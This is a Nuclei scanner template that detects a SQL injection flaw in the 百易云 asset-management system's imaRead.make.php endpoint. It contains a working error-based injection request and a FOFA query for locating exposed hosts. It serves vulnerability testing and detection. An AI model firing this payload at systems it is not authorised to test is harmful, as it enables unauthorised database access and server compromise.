http:
    - matchers:
        - part: body
          type: word
          words:
            - ~4297f44b13955235245b2497399d7a9
        - status:
            - 200
          type: status
      matchers-condition: and
      raw:
        - |
          POST /adminx/imaRead.make.php?act=remake HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
          Content-Type: application/x-www-form-urlencoded

          feeItem[]=1+AND+updatexml(1,concat(0x7e,md5(123123)),1)
id: baiyiyun-imaRead_make_php-sql
info:
    author: Superhero
    description: |-
        fofa: body="media/css/uniform.default.css" && body="资管云" || body="不要着急，点此" || title="资管云"
        百易云资产管理运营系统 imaRead.make.php 接口存在SQL注入漏洞，未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息（例如，管理员后台密码、站点的用户个人信息）之外，甚至在高权限的情况可向服务器中写入木马，进一步获取服务器系统权限。
    name: 百易云资产管理运营系统 imaRead.make.php SQL注入漏洞
    reference:
        - https://mp.weixin.qq.com/s/NnHd9L1C7p8icCbCEIhs6A
    severity: high
    tags:
        - 百易云资产管理运营系统
